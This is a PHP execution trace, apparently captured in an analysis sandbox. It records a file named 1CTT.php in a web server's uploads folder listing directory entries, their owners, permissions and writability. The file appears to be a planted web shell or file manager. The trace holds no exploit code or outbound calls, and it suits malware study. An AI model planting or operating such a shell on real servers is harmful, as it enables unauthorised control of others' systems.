2	2007	0	0.109080	727552	perms	1		/var/www/html/uploads/1CTT.php	1085	1	'/var/www/html/uploads/.'
3	2008	0	0.109097	727552	fileperms	0		/var/www/html/uploads/1CTT.php	218	1	'/var/www/html/uploads/.'
3	2008	1	0.109111	727608
3	2008	R			16895
2		A						/var/www/html/uploads/1CTT.php	218	$perms = 16895
2		A						/var/www/html/uploads/1CTT.php	228	$info = 'd'
2		A						/var/www/html/uploads/1CTT.php	236	$info .= 'r'
2		A						/var/www/html/uploads/1CTT.php	237	$info .= 'w'
2		A						/var/www/html/uploads/1CTT.php	240	$info .= 'x'
2		A						/var/www/html/uploads/1CTT.php	241	$info .= 'r'
2		A						/var/www/html/uploads/1CTT.php	242	$info .= 'w'
2		A						/var/www/html/uploads/1CTT.php	245	$info .= 'x'
2		A						/var/www/html/uploads/1CTT.php	246	$info .= 'r'
2		A						/var/www/html/uploads/1CTT.php	247	$info .= 'w'
2		A						/var/www/html/uploads/1CTT.php	250	$info .= 'x'
3	2009	0	0.109231	727608	sprintf	0		/var/www/html/uploads/1CTT.php	251	2	'%o'	16895
3	2009	1	0.109245	727992
3	2009	R			'40777'
3	2010	0	0.109258	727928	substr	0		/var/www/html/uploads/1CTT.php	251	2	'40777'	-4
3	2010	1	0.109270	728024
3	2010	R			'0777'
2	2007	1	0.109283	727616
2	2007	R			'0777 >> drwxrwxrwx'
2	2011	0	0.109297	727568	checkPerm	1		/var/www/html/uploads/1CTT.php	1085	2	'/var/www/html/uploads/.'	'0777 >> drwxrwxrwx'
3	2012	0	0.109311	727568	explode	0		/var/www/html/uploads/1CTT.php	309	2	'>>'	'0777 >> drwxrwxrwx'
3	2012	1	0.109325	728088
3	2012	R			[0 => '0777 ', 1 => ' drwxrwxrwx']
2		A						/var/www/html/uploads/1CTT.php	309	$perm = [0 => '0777 ', 1 => ' drwxrwxrwx']
3	2013	0	0.109353	728016	is_writable	0		/var/www/html/uploads/1CTT.php	310	1	'/var/www/html/uploads/.'
3	2013	1	0.109369	728056
3	2013	R			TRUE
3	2014	0	0.109382	728016	trim	0		/var/www/html/uploads/1CTT.php	311	1	'0777 '
3	2014	1	0.109394	728080
3	2014	R			'0777'
3	2015	0	0.109407	728336	trim	0		/var/www/html/uploads/1CTT.php	311	1	'0777 '
3	2015	1	0.109419	728400
3	2015	R			'0777'
2	2011	1	0.109433	727952
2	2011	R			'<font class=\'text-success\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0777\' data-bs-name=\'/var/www/html/uploads/.\'>0777 </font> >> <font class=\'text-success\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0777\' data-bs-name=\'/var/www/html/uploads/.\'> drwxrwxrwx</font>'
2	2016	0	0.109457	727528	is_dir	0		/var/www/html/uploads/1CTT.php	1069	1	'/var/www/html/uploads/..'
2	2016	1	0.109472	727576
2	2016	R			TRUE
2	2017	0	0.109486	727480	dirname	0		/var/www/html/uploads/1CTT.php	1074	1	'/var/www/html/uploads'
2	2017	1	0.109498	727560
2	2017	R			'/var/www/html'
2	2018	0	0.109512	727480	filetype	0		/var/www/html/uploads/1CTT.php	1081	1	'..'
2	2018	1	0.109526	727552
2	2018	R			'dir'
2	2019	0	0.109540	727480	filemtime	0		/var/www/html/uploads/1CTT.php	1083	1	'..'
2	2019	1	0.109553	727496
2	2019	R			1676250662
2	2020	0	0.109566	727456	date	0		/var/www/html/uploads/1CTT.php	1083	2	'Y-m-d h:i:s'	1676250662
2	2020	1	0.109582	727784
2	2020	R			'2023-02-13 08:11:02'
2	2021	0	0.109596	727456	getowner	1		/var/www/html/uploads/1CTT.php	1084	1	'..'
3	2022	0	0.109609	727456	function_exists	0		/var/www/html/uploads/1CTT.php	321	1	'posix_getpwuid'
3	2022	1	0.109622	727496
3	2022	R			TRUE
3	2023	0	0.109635	727456	fileowner	0		/var/www/html/uploads/1CTT.php	322	1	'..'
3	2023	1	0.109647	727496
3	2023	R			0
3	2024	0	0.109659	727456	posix_getpwuid	0		/var/www/html/uploads/1CTT.php	322	1	0
3	2024	1	0.109682	728256
3	2024	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1CTT.php	322	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1CTT.php	323	$downer = 'root'
3	2025	0	0.109734	727488	function_exists	0		/var/www/html/uploads/1CTT.php	327	1	'posix_getgrgid'
3	2025	1	0.109747	727528
3	2025	R			TRUE
3	2026	0	0.109759	727488	filegroup	0		/var/www/html/uploads/1CTT.php	328	1	'..'
3	2026	1	0.109772	727528
3	2026	R			0
3	2027	0	0.109784	727488	posix_getgrgid	0		/var/www/html/uploads/1CTT.php	328	1	0
3	2027	1	0.109806	728144
3	2027	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1CTT.php	328	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1CTT.php	329	$dgrp = 'root'
2	2021	1	0.109855	727496
2	2021	R			'root/root'
2	2028	0	0.109869	727568	perms	1		/var/www/html/uploads/1CTT.php	1085	1	'/var/www/html/uploads/..'
3	2029	0	0.109881	727568	fileperms	0		/var/www/html/uploads/1CTT.php	218	1	'/var/www/html/uploads/..'
3	2029	1	0.109895	727632
3	2029	R			16895
2		A						/var/www/html/uploads/1CTT.php	218	$perms = 16895
2		A						/var/www/html/uploads/1CTT.php	228	$info = 'd'
2		A						/var/www/html/uploads/1CTT.php	236	$info .= 'r'
2		A						/var/www/html/uploads/1CTT.php	237	$info .= 'w'
2		A						/var/www/html/uploads/1CTT.php	240	$info .= 'x'
2		A						/var/www/html/uploads/1CTT.php	241	$info .= 'r'
2		A						/var/www/html/uploads/1CTT.php	242	$info .= 'w'
2		A						/var/www/html/uploads/1CTT.php	245	$info .= 'x'
2		A						/var/www/html/uploads/1CTT.php	246	$info .= 'r'
2		A						/var/www/html/uploads/1CTT.php	247	$info .= 'w'
2		A						/var/www/html/uploads/1CTT.php	250	$info .= 'x'
3	2030	0	0.110013	727632	sprintf	0		/var/www/html/uploads/1CTT.php	251	2	'%o'	16895
3	2030	1	0.110027	728016
3	2030	R			'40777'
3	2031	0	0.110039	727952	substr	0		/var/www/html/uploads/1CTT.php	251	2	'40777'	-4
3	2031	1	0.110052	728048
3	2031	R			'0777'
2	2028	1	0.110065	727640
2	2028	R			'0777 >> drwxrwxrwx'
2	2032	0	0.110078	727584	checkPerm	1		/var/www/html/uploads/1CTT.php	1085	2	'/var/www/html/uploads/..'	'0777 >> drwxrwxrwx'
3	2033	0	0.110093	727584	explode	0		/var/www/html/uploads/1CTT.php	309	2	'>>'	'0777 >> drwxrwxrwx'
3	2033	1	0.110107	728104
3	2033	R			[0 => '0777 ', 1 => ' drwxrwxrwx']
2		A						/var/www/html/uploads/1CTT.php	309	$perm = [0 => '0777 ', 1 => ' drwxrwxrwx']
3	2034	0	0.110134	728032	is_writable	0		/var/www/html/uploads/1CTT.php	310	1	'/var/www/html/uploads/..'
3	2034	1	0.110149	728072
3	2034	R			TRUE
3	2035	0	0.110162	728032	trim	0		/var/www/html/uploads/1CTT.php	311	1	'0777 '
3	2035	1	0.110175	728096
3	2035	R			'0777'
3	2036	0	0.110188	728352	trim	0		/var/www/html/uploads/1CTT.php	311	1	'0777 '
3	2036	1	0.110200	728416
3	2036	R			'0777'
2	2032	1	0.110213	727968
2	2032	R			'<font class=\'text-success\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0777\' data-bs-name=\'/var/www/html/uploads/..\'>0777 </font> >> <font class=\'text-success\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0777\' data-bs-name=\'/var/www/html/uploads/..\'> drwxrwxrwx</font>'
2	2037	0	0.110237	727536	is_dir	0		/var/www/html/uploads/1CTT.php	1069	1	'/var/www/html/uploads/.htaccess'
2	2037	1	0.110252	727576
2	2037	R			FALSE
2	2038	0	0.110266	727536	is_dir	0		/var/www/html/uploads/1CTT.php	1069	1	'/var/www/html/uploads/1CTT.php'
2	2038	1	0.110280	727576
2	2038	R			FALSE
2	2039	0	0.110293	727536	is_dir	0		/var/www/html/uploads/1CTT.php	1069	1	'/var/www/html/uploads/data'
2	2039	1	0.110307	727576
2	2039	R			TRUE
2	2040	0	0.110322	727480	checkName	1		/var/www/html/uploads/1CTT.php	1078	1	'data'
3	2041	0	0.110335	727480	strlen	0		/var/www/html/uploads/1CTT.php	301	1	'data'
3	2041	1	0.110347	727512
3	2041	R			4
2	2040	1	0.110360	727480
2	2040	R			'data'
2	2042	0	0.110373	727480	filetype	0		/var/www/html/uploads/1CTT.php	1081	1	'data'
2	2042	1	0.110387	727552
2	2042	R			'dir'
2	2043	0	0.110401	727480	filemtime	0		/var/www/html/uploads/1CTT.php	1083	1	'data'
2	2043	1	0.110414	727496
2	2043	R			1676250662
2	2044	0	0.110426	727456	date	0		/var/www/html/uploads/1CTT.php	1083	2	'Y-m-d h:i:s'	1676250662
2	2044	1	0.110442	727784
2	2044	R			'2023-02-13 08:11:02'
2	2045	0	0.110456	727456	getowner	1		/var/www/html/uploads/1CTT.php	1084	1	'data'
3	2046	0	0.110468	727456	function_exists	0		/var/www/html/uploads/1CTT.php	321	1	'posix_getpwuid'
3	2046	1	0.110481	727496
3	2046	R			TRUE
3	2047	0	0.110494	727456	fileowner	0		/var/www/html/uploads/1CTT.php	322	1	'data'
3	2047	1	0.110506	727496
3	2047	R			0
3	2048	0	0.110518	727456	posix_getpwuid	0		/var/www/html/uploads/1CTT.php	322	1	0
3	2048	1	0.110540	728256
3	2048	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1CTT.php	322	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1CTT.php	323	$downer = 'root'
3	2049	0	0.110598	727488	function_exists	0		/var/www/html/uploads/1CTT.php	327	1	'posix_getgrgid'
3	2049	1	0.110618	727528
3	2049	R			TRUE
3	2050	0	0.110636	727488	filegroup	0		/var/www/html/uploads/1CTT.php	328	1	'data'
3	2050	1	0.110649	727528
3	2050	R			0
3	2051	0	0.110662	727488	posix_getgrgid	0		/var/www/html/uploads/1CTT.php	328	1	0
3	2051	1	0.110686	728144
3	2051	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1CTT.php	328	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1CTT.php	329	$dgrp = 'root'
2	2045	1	0.110732	727496
2	2045	R			'root/root'
2	2052	0	0.110747	727568	perms	1		/var/www/html/uploads/1CTT.php	1085	1	'/var/www/html/uploads/data'
3	2053	0	0.110761	727568	fileperms	0		/var/www/html/uploads/1CTT.php	218	1	'/var/www/html/uploads/data'
3	2053	1	0.110776	727632
3	2053	R			16895
2		A						/var/www/html/uploads/1CTT.php	218	$perms = 16895
2		A						/var/www/html/uploads/1CTT.php	228	$info = 'd'
2		A						/var/www/html/uploads/1CTT.php	236	$info .= 'r'
2		A						/var/www/html/uploads/1CTT.php	237	$info .= 'w'
2		A						/var/www/html/uploads/1CTT.php	240	$info .= 'x'
2		A						/var/www/html/uploads/1CTT.php	241	$info .= 'r'
2		A						/var/www/html/uploads/1CTT.php	242	$info .= 'w'
2		A						/var/www/html/uploads/1CTT.php	245	$info .= 'x'
2		A						/var/www/html/uploads/1CTT.php	246	$info .= 'r'
2		A						/var/www/html/uploads/1CTT.php	247	$info .= 'w'
2		A						/var/www/html/uploads/1CTT.php	250	$info .= 'x'
3	2054	0	0.110896	727632	sprintf	0		/var/www/html/uploads/1CTT.php	251	2	'%o'	16895
3	2054	1	0.110909	728016
3	2054	R			'40777'
3	2055	0	0.110923	727952	substr	0		/var/www/html/uploads/1CTT.php	251	2	'40777'	-4
3	2055	1	0.110935	728048
3	2055	R			'0777'
2	2052	1	0.110948	727640
2	2052	R			'0777 >> drwxrwxrwx'
2	2056	0	0.110963	727584	checkPerm	1		/var/www/html/uploads/1CTT.php	1085	2	'/var/www/html/uploads/data'	'0777 >> drwxrwxrwx'
3	2057	0	0.110976	727584	explode	0		/var/www/html/uploads/1CTT.php	309	2	'>>'	'0777 >> drwxrwxrwx'
3	2057	1	0.110990	728104
3	2057	R			[0 => '0777 ', 1 => ' drwxrwxrwx']
2		A						/var/www/html/uploads/1CTT.php	309	$perm = [0 => '0777 ', 1 => ' drwxrwxrwx']
3	2058	0	0.111018	728032	is_writable	0		/var/www/html/uploads/1CTT.php	310	1	'/var/www/html/uploads/data'
3	2058	1	0.111034	728072
3	2058	R			TRUE
3	2059	0	0.111048	728032	trim	0		/var/www/html/uploads/1CTT.php	311	1	'0777 '
3	2059	1	0.111060	728096
3	2059	R			'0777'
3	2060	0	0.111074	728352	trim	0		/var/www/html/uploads/1CTT.php	311	1	'0777 '
3	2060	1	0.111085	728416
3	2060	R			'0777'
2	2056	1	0.111098	727968
2	2056	R			'<font class=\'text-success\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0777\' data-bs-name=\'/var/www/html/uploads/data\'>0777 </font> >> <font class=\'text-success\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0777\' data-bs-name=\'/var/www/html/uploads/data\'> drwxrwxrwx</font>'
2	2061	0	0.111124	727544	is_dir	0		/var/www/html/uploads/1CTT.php	1069	1	'/var/www/html/uploads/prepend.php'
2	2061	1	0.111139	727592
2	2061	R			FALSE
2	2062	0	0.111154	727536	is_file	0		/var/www/html/uploads/1CTT.php	1094	1	'/var/www/html/uploads/.'
2	2062	1	0.111169	727560
2	2062	R			FALSE
2	2063	0	0.111182	727528	is_file	0		/var/www/html/uploads/1CTT.php	1094	1	'/var/www/html/uploads/..'
2	2063	1	0.111196	727576
2	2063	R			FALSE
2	2064	0	0.111210	727536	is_file	0		/var/www/html/uploads/1CTT.php	1094	1	'/var/www/html/uploads/.htaccess'
2	2064	1	0.111225	727576
2	2064	R			TRUE
2	2065	0	0.111239	727480	geticon	1		/var/www/html/uploads/1CTT.php	1097	1	'.htaccess'
3	2066	0	0.111253	727480	pathinfo	0		/var/www/html/uploads/1CTT.php	338	2	'.htaccess'	4
3	2066	1	0.111267	727584
3	2066	R			'htaccess'
3	2067	0	0.111281	727520	strtolower	0		/var/www/html/uploads/1CTT.php	338	1	'htaccess'
3	2067	1	0.111293	727552
3	2067	R			'htaccess'
2		A						/var/www/html/uploads/1CTT.php	338	$ext = 'htaccess'
2	2065	1	0.111324	727480
2	2065	R			'file'
2	2068	0	0.111338	727480	checkName	1		/var/www/html/uploads/1CTT.php	1097	1	'.htaccess'
3	2069	0	0.111351	727480	strlen	0		/var/www/html/uploads/1CTT.php	301	1	'.htaccess'
3	2069	1	0.111364	727512
3	2069	R			9
2	2068	1	0.111377	727480
2	2068	R			'.htaccess'
2	2070	0	0.111391	727480	function_exists	0		/var/www/html/uploads/1CTT.php	1098	1	'mime_content_type'
2	2070	1	0.111405	727520
2	2070	R			TRUE
2	2071	0	0.111418	727480	mime_content_type	0		/var/www/html/uploads/1CTT.php	1098	1	'.htaccess'
2	2071	1	0.112810	727664
2	2071	R			'text/plain'
2	2072	0	0.112834	727632	checkName	1		/var/www/html/uploads/1CTT.php	1098	1	'text/plain'
3	2073	0	0.112851	727632	strlen	0		/var/www/html/uploads/1CTT.php	301	1	'text/plain'
3	2073	1	0.112864	727664
3	2073	R			10
2	2072	1	0.112878	727632
2	2072	R			'text/plain'
2	2074	0	0.112894	727592	filesize	0		/var/www/html/uploads/1CTT.php	1099	1	'.htaccess'
2	2074	1	0.112911	727616
2	2074	R			64
2	2075	0	0.112925	727576	formatSize	1		/var/www/html/uploads/1CTT.php	1099	1	64
2		A						/var/www/html/uploads/1CTT.php	211	$types = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
2		A						/var/www/html/uploads/1CTT.php	212	$i = 0
3	2076	0	0.112964	727576	round	0		/var/www/html/uploads/1CTT.php	213	2	64	2
3	2076	1	0.112976	727648
3	2076	R			64
2	2075	1	0.112992	727608
2	2075	R			'64 B'
2	2077	0	0.113006	727576	filemtime	0		/var/www/html/uploads/1CTT.php	1100	1	'.htaccess'
2	2077	1	0.113019	727616
2	2077	R			1676250662
2	2078	0	0.113032	727576	date	0		/var/www/html/uploads/1CTT.php	1100	2	'Y-m-d h:i:s'	1676250662
2	2078	1	0.113049	727904
2	2078	R			'2023-02-13 08:11:02'
2	2079	0	0.113063	727576	getowner	1		/var/www/html/uploads/1CTT.php	1101	1	'.htaccess'
3	2080	0	0.113076	727576	function_exists	0		/var/www/html/uploads/1CTT.php	321	1	'posix_getpwuid'
3	2080	1	0.113090	727616
3	2080	R			TRUE
3	2081	0	0.113103	727576	fileowner	0		/var/www/html/uploads/1CTT.php	322	1	'.htaccess'
3	2081	1	0.113115	727616
3	2081	R			0
3	2082	0	0.113128	727576	posix_getpwuid	0		/var/www/html/uploads/1CTT.php	322	1	0
3	2082	1	0.113154	728376
3	2082	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1CTT.php	322	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1CTT.php	323	$downer = 'root'
3	2083	0	0.113208	727608	function_exists	0		/var/www/html/uploads/1CTT.php	327	1	'posix_getgrgid'
3	2083	1	0.113222	727648
3	2083	R			TRUE
3	2084	0	0.113235	727608	filegroup	0		/var/www/html/uploads/1CTT.php	328	1	'.htaccess'
3	2084	1	0.113248	727648
3	2084	R			0
3	2085	0	0.113260	727608	posix_getgrgid	0		/var/www/html/uploads/1CTT.php	328	1	0
3	2085	1	0.113283	728264
3	2085	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1CTT.php	328	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1CTT.php	329	$dgrp = 'root'
2	2079	1	0.113329	727616
2	2079	R			'root/root'
2	2086	0	0.113344	727688	perms	1		/var/www/html/uploads/1CTT.php	1102	1	'/var/www/html/uploads/.htaccess'
3	2087	0	0.113358	727688	fileperms	0		/var/www/html/uploads/1CTT.php	218	1	'/var/www/html/uploads/.htaccess'
3	2087	1	0.113373	727744
3	2087	R			33188
2		A						/var/www/html/uploads/1CTT.php	218	$perms = 33188
2		A						/var/www/html/uploads/1CTT.php	224	$info = '-'
2		A						/var/www/html/uploads/1CTT.php	236	$info .= 'r'
2		A						/var/www/html/uploads/1CTT.php	237	$info .= 'w'
2		A						/var/www/html/uploads/1CTT.php	240	$info .= '-'
2		A						/var/www/html/uploads/1CTT.php	241	$info .= 'r'
2		A						/var/www/html/uploads/1CTT.php	242	$info .= '-'
2		A						/var/www/html/uploads/1CTT.php	245	$info .= '-'
2		A						/var/www/html/uploads/1CTT.php	246	$info .= 'r'
2		A						/var/www/html/uploads/1CTT.php	247	$info .= '-'
2		A						/var/www/html/uploads/1CTT.php	250	$info .= '-'
3	2088	0	0.113501	727744	sprintf	0		/var/www/html/uploads/1CTT.php	251	2	'%o'	33188
3	2088	1	0.113514	728128
3	2088	R			'100644'
3	2089	0	0.113528	728064	substr	0		/var/www/html/uploads/1CTT.php	251	2	'100644'	-4
3	2089	1	0.113541	728160
3	2089	R			'0644'
2	2086	1	0.113555	727752
2	2086	R			'0644 >> -rw-r--r--'
2	2090	0	0.113570	727696	checkPerm	1		/var/www/html/uploads/1CTT.php	1102	2	'/var/www/html/uploads/.htaccess'	'0644 >> -rw-r--r--'
3	2091	0	0.113585	727696	explode	0		/var/www/html/uploads/1CTT.php	309	2	'>>'	'0644 >> -rw-r--r--'
3	2091	1	0.113600	728216
3	2091	R			[0 => '0644 ', 1 => ' -rw-r--r--']
2		A						/var/www/html/uploads/1CTT.php	309	$perm = [0 => '0644 ', 1 => ' -rw-r--r--']
3	2092	0	0.113629	728144	is_writable	0		/var/www/html/uploads/1CTT.php	310	1	'/var/www/html/uploads/.htaccess'
3	2092	1	0.113646	728184
3	2092	R			FALSE
3	2093	0	0.113660	728144	is_readable	0		/var/www/html/uploads/1CTT.php	312	1	'/var/www/html/uploads/.htaccess'
3	2093	1	0.113675	728184
3	2093	R			TRUE
3	2094	0	0.113688	728144	trim	0		/var/www/html/uploads/1CTT.php	315	1	'0644 '
3	2094	1	0.113700	728208
3	2094	R			'0644'
3	2095	0	0.113714	728464	trim	0		/var/www/html/uploads/1CTT.php	315	1	'0644 '
3	2095	1	0.113725	728528
3	2095	R			'0644'
2	2090	1	0.113739	728080
2	2090	R			'<font class=\'text-secondary\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0644\' data-bs-name=\'/var/www/html/uploads/.htaccess\'>0644 </font> >> <font class=\'text-secondary\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0644\' data-bs-name=\'/var/www/html/uploads/.htaccess\'> -rw-r--r--</font>'
2	2096	0	0.113867	727648	is_file	0		/var/www/html/uploads/1CTT.php	1094	1	'/var/www/html/uploads/1CTT.php'
2	2096	1	0.113883	727688
2	2096	R			TRUE
2	2097	0	0.113897	727592	geticon	1		/var/www/html/uploads/1CTT.php	1097	1	'1CTT.php'
3	2098	0	0.113910	727592	pathinfo	0		/var/www/html/uploads/1CTT.php	338	2	'1CTT.php'	4
3	2098	1	0.113924	727688
3	2098	R			'php'
3	2099	0	0.113937	727624	strtolower	0		/var/www/html/uploads/1CTT.php	338	1	'php'
3	2099	1	0.113950	727656
3	2099	R			'php'
2		A						/var/www/html/uploads/1CTT.php	338	$ext = 'php'
2	2097	1	0.113974	727592
2	2097	R			'file-code'
2	2100	0	0.113989	727592	checkName	1		/var/www/html/uploads/1CTT.php	1097	1	'1CTT.php'
3	2101	0	0.114002	727592	strlen	0		/var/www/html/uploads/1CTT.php	301	1	'1CTT.php'
3	2101	1	0.114013	727624
3	2101	R			8
2	2100	1	0.114027	727592
2	2100	R			'1CTT.php'
2	2102	0	0.114040	727592	function_exists	0		/var/www/html/uploads/1CTT.php	1098	1	'mime_content_type'
2	2102	1	0.114054	727632
2	2102	R			TRUE
2	2103	0	0.114067	727592	mime_content_type	0		/var/www/html/uploads/1CTT.php	1098	1	'1CTT.php'
2	2103	1	0.116029	727664
2	2103	R			'text/x-php'
2	2104	0	0.116053	727632	checkName	1		/var/www/html/uploads/1CTT.php	1098	1	'text/x-php'
3	2105	0	0.116069	727632	strlen	0		/var/www/html/uploads/1CTT.php	301	1	'text/x-php'
3	2105	1	0.116083	727664
3	2105	R			10
2	2104	1	0.116097	727632
2	2104	R			'text/x-php'
2	2106	0	0.116112	727592	filesize	0		/var/www/html/uploads/1CTT.php	1099	1	'1CTT.php'
2	2106	1	0.116128	727616
2	2106	R			66252
2	2107	0	0.116141	727576	formatSize	1		/var/www/html/uploads/1CTT.php	1099	1	66252
2		A						/var/www/html/uploads/1CTT.php	211	$types = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
2		A						/var/www/html/uploads/1CTT.php	212	$i = 0
3	2108	0	0.116179	727576	count	0		/var/www/html/uploads/1CTT.php	212	1	[0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
3	2108	1	0.116196	727608
3	2108	R			5
2		A						/var/www/html/uploads/1CTT.php	212	$bytes /= 1024
2		A						/var/www/html/uploads/1CTT.php	212	$i++
3	2109	0	0.116230	727576	round	0		/var/www/html/uploads/1CTT.php	213	2	64.69921875	2
3	2109	1	0.116244	727648
3	2109	R			64.7
2	2107	1	0.116259	727608
2	2107	R			'64.7 KB'
2	2110	0	0.116273	727576	filemtime	0		/var/www/html/uploads/1CTT.php	1100	1	'1CTT.php'
2	2110	1	0.116286	727616
2	2110	R			1676250662
2	2111	0	0.116304	727576	date	0		/var/www/html/uploads/1CTT.php	1100	2	'Y-m-d h:i:s'	1676250662
2	2111	1	0.116320	727904
2	2111	R			'2023-02-13 08:11:02'
2	2112	0	0.116335	727576	getowner	1		/var/www/html/uploads/1CTT.php	1101	1	'1CTT.php'
3	2113	0	0.116348	727576	function_exists	0		/var/www/html/uploads/1CTT.php	321	1	'posix_getpwuid'
3	2113	1	0.116361	727616
3	2113	R			TRUE
3	2114	0	0.116374	727576	fileowner	0		/var/www/html/uploads/1CTT.php	322	1	'1CTT.php'
3	2114	1	0.116386	727616
3	2114	R			1000
3	2115	0	0.116399	727576	posix_getpwuid	0		/var/www/html/uploads/1CTT.php	322	1	1000
3	2115	1	0.116433	728392
3	2115	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1CTT.php	322	$downer = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1CTT.php	323	$downer = 'osboxes'
3	2116	0	0.116487	727608	function_exists	0		/var/www/html/uploads/1CTT.php	327	1	'posix_getgrgid'
3	2116	1	0.116501	727648
3	2116	R			TRUE
3	2117	0	0.116515	727608	filegroup	0		/var/www/html/uploads/1CTT.php	328	1	'1CTT.php'
3	2117	1	0.116527	727648
3	2117	R			1000
3	2118	0	0.116540	727608	posix_getgrgid	0		/var/www/html/uploads/1CTT.php	328	1	1000
3	2118	1	0.116572	728264
3	2118	R			['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2		A						/var/www/html/uploads/1CTT.php	328	$dgrp = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2		A						/var/www/html/uploads/1CTT.php	329	$dgrp = 'osboxes'
2	2112	1	0.116618	727616
2	2112	R			'osboxes/osboxes'
2	2119	0	0.116632	727688	perms	1		/var/www/html/uploads/1CTT.php	1102	1	'/var/www/html/uploads/1CTT.php'
3	2120	0	0.116645	727688	fileperms	0		/var/www/html/uploads/1CTT.php	218	1	'/var/www/html/uploads/1CTT.php'
3	2120	1	0.116660	727744
3	2120	R			33204
2		A						/var/www/html/uploads/1CTT.php	218	$perms = 33204
2		A						/var/www/html/uploads/1CTT.php	224	$info = '-'
2		A						/var/www/html/uploads/1CTT.php	236	$info .= 'r'
2		A						/var/www/html/uploads/1CTT.php	237	$info .= 'w'
2		A						/var/www/html/uploads/1CTT.php	240	$info .= '-'
2		A						/var/www/html/uploads/1CTT.php	241	$info .= 'r'
2		A						/var/www/html/uploads/1CTT.php	242	$info .= 'w'
2		A						/var/www/html/uploads/1CTT.php	245	$info .= '-'
2		A						/var/www/html/uploads/1CTT.php	246	$info .= 'r'
2		A						/var/www/html/uploads/1CTT.php	247	$info .= '-'
2		A						/var/www/html/uploads/1CTT.php	250	$info .= '-'
3	2121	0	0.116780	727744	sprintf	0		/var/www/html/uploads/1CTT.php	251	2	'%o'	33204
3	2121	1	0.116794	728128
3	2121	R			'100664'
3	2122	0	0.116807	728064	substr	0		/var/www/html/uploads/1CTT.php	251	2	'100664'	-4
3	2122	1	0.116820	728160
3	2122	R			'0664'
2	2119	1	0.116833	727752
2	2119	R			'0664 >> -rw-rw-r--'
2	2123	0	0.116848	727696	checkPerm	1		/var/www/html/uploads/1CTT.php	1102	2	'/var/www/html/uploads/1CTT.php'	'0664 >> -rw-rw-r--'
3	2124	0	0.116862	727696	explode	0		/var/www/html/uploads/1CTT.php	309	2	'>>'	'0664 >> -rw-rw-r--'
3	2124	1	0.116877	728216
3	2124	R			[0 => '0664 ', 1 => ' -rw-rw-r--']
2		A						/var/www/html/uploads/1CTT.php	309	$perm = [0 => '0664 ', 1 => ' -rw-rw-r--']
3	2125	0	0.116905	728144	is_writable	0		/var/www/html/uploads/1CTT.php	310	1	'/var/www/html/uploads/1CTT.php'
3	2125	1	0.116921	728184
3	2125	R			FALSE
3	2126	0	0.116935	728144	is_readable	0		/var/www/html/uploads/1CTT.php	312	1	'/var/www/html/uploads/1CTT.php'
3	2126	1	0.116949	728184
3	2126	R			TRUE
3	2127	0	0.116963	728144	trim	0		/var/www/html/uploads/1CTT.php	315	1	'0664 '
3	2127	1	0.116975	728208
3	2127	R			'0664'
3	2128	0	0.116989	728464	trim	0		/var/www/html/uploads/1CTT.php	315	1	'0664 '
3	2128	1	0.117001	728528
3	2128	R			'0664'
2	2123	1	0.117014	728080
2	2123	R			'<font class=\'text-secondary\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0664\' data-bs-name=\'/var/www/html/uploads/1CTT.php\'>0664 </font> >> <font class=\'text-secondary\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0664\' data-bs-name=\'/var/www/html/uploads/1CTT.php\'> -rw-rw-r--</font>'
